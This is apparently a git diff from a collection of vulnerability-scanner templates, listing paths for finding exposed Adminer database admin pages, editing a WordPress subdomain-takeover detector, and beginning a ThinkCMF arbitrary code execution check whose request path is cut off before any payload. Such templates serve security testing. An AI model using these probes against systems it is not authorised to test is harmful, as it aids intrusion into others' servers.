+/editor-4.7.6-mysql-en.php +/editor-4.7.6-mysql-pl.php +/editor-4.7.6-mysql-sk.php +/editor-4.7.6-mysql.php +/editor-4.7.6-pl.php +/editor-4.7.6-sk.php +/editor-4.7.6.php +/editor-4.7.7-cs.php +/editor-4.7.7-de.php +/editor-4.7.7-en.php +/editor-4.7.7-mysql-cs.php +/editor-4.7.7-mysql-de.php +/editor-4.7.7-mysql-en.php +/editor-4.7.7-mysql-pl.php +/editor-4.7.7-mysql-sk.php +/editor-4.7.7-mysql.php +/editor-4.7.7-pl.php +/editor-4.7.7-sk.php +/editor-4.7.7.php +/editor-4.7.8-cs.php +/editor-4.7.8-de.php +/editor-4.7.8-en.php +/editor-4.7.8-mysql-cs.php +/editor-4.7.8-mysql-de.php +/editor-4.7.8-mysql-en.php +/editor-4.7.8-mysql-pl.php +/editor-4.7.8-mysql-sk.php +/editor-4.7.8-mysql.php +/editor-4.7.8-pl.php +/editor-4.7.8-sk.php +/editor-4.7.8.php +/editor-4.7.9-cs.php +/editor-4.7.9-de.php +/editor-4.7.9-en.php +/editor-4.7.9-mysql-cs.php +/editor-4.7.9-mysql-de.php +/editor-4.7.9-mysql-en.php +/editor-4.7.9-mysql-pl.php +/editor-4.7.9-mysql-sk.php +/editor-4.7.9-mysql.php +/editor-4.7.9-pl.php +/editor-4.7.9-sk.php +/editor-4.7.9.php +/editor-4.8.0-cs.php +/editor-4.8.0-de.php +/editor-4.8.0-en.php +/editor-4.8.0-mysql-cs.php +/editor-4.8.0-mysql-de.php +/editor-4.8.0-mysql-en.php +/editor-4.8.0-mysql-pl.php +/editor-4.8.0-mysql-sk.php +/editor-4.8.0-mysql.php +/editor-4.8.0-pl.php +/editor-4.8.0-sk.php +/editor-4.8.0.php +/editor-mysql.php +/editor.php +/editor/ +/mysql.php +/php/adminer.php +/phpmyadmin.php +/public/adminer.php +/sql.php +/tools/adminer.php +/web/adminer.php +/wp-content/plugins/adminer/adminer.php \ No newline at end of file diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index bd4783aaeb..34205346dd 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -1,10 +1,10 @@ id: wordpress-takeover info: - name: wordpress takeover detection - author: pdcommunity + name: WordPress takeover detection + author: pdcommunity & geeknik severity: high - tags: takeover + tags: takeover,wordpress reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: @@ -12,7 +12,13 @@ requests: path: - "{{BaseURL}}" + redirects: true + matchers-condition: and matchers: - type: word words: - - Do you want to register \ No newline at end of file + - 'Do you want to register' + + - type: regex + regex: + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml new file mode 100644 index 0000000000..b35db666c5 --- /dev/null +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -0,0 +1,27 @@ +id: thinkcmf-arbitrary-code-execution + +info: + name: ThinkCMF Arbitrary code execution + author: pikpikcu + severity: high + reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + tags: thinkcmf + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=